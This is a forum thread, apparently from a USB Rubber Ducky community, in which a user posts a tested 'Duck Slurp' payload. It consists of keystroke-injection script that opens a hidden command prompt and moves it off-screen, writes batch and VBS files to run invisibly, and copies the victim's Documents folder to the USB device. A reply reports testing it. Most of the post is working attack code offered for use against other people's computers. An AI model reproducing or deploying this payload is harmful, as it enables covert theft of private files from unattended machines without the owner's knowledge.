Jump to content

[Payload] Duck Slurp payload


overwraith
 Share

Recommended Posts

For anyone who has heard about pod slurping, which is to say an Ipod, this works exactly like that. Here is the website that I mostly based my work on:

http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS

Since the USB rubber ducky brings back autorun, it also brings back a form of pod slurping.

To speed up this payload you could use a separate USB drive labeled "DUCKY" in a tandem ducky attack. Other USB drives mount instantly, and can be temporarily fused to the duck with a USB cable splitter. I have also been noticing that the Twin Duck firmware has been getting even faster in mounting the "DUCKY" drive, so the "RunEXE from SD" payload may soon become unnecessary.

The following is a modification of "RunEXE from SD":

REM Author: overwraith
REM Name: DuckSlurp.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders. 
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER
STRING START %DUCKYdrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

If you do not keep all your payload files in a separate folder on the ducky, and you do keep all files on the root, you will need to remove these lines:

REM Remove the next two lines if you don't place your payloads in separate folders. 
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER

In the batch file you will have to remove the small part that says "DuckSlurp" in the line:

set destination=%~d0\DuckSlurp\%COMPUTERNAME%

The following is the batch file which resides in the DuckSlurp folder:

REM File: DuckSlurp.bat
REM Purpose: a duck slurper payload, similar to pod slurping.
REM Original post: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS
@echo off

REM %0 path to the batch file
REM ~d is the drive

REM Located in DuckSlurp folder to seperate from other payloads.
set destination=%~d0\DuckSlurp\%COMPUTERNAME%

echo %destination%

mkdir %destination%

REM Had to remove support for previous OSes because there is a
REM folder that is exactly the same on Windows 7, only access denied.

REM Windows Vista, and Windows 7
if Exist %USERPROFILE%\Documents (
xcopy %USERPROFILE%\Documents %destination%
)

@cls
@exit

This payload now works, and has been tested.

Edited by overwraith
Link to comment
Share on other sites

Seems like a great Payload. I tested it out and I found out that this version of the Run.exe does not work for me. It brings up a window asking me yes or no if I want to allow diskport to make changes.

I plugged it into the other Run.exe code and everything ran fine. When the .bat is executed this is what happens.

slurp_zps0156c221.png

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...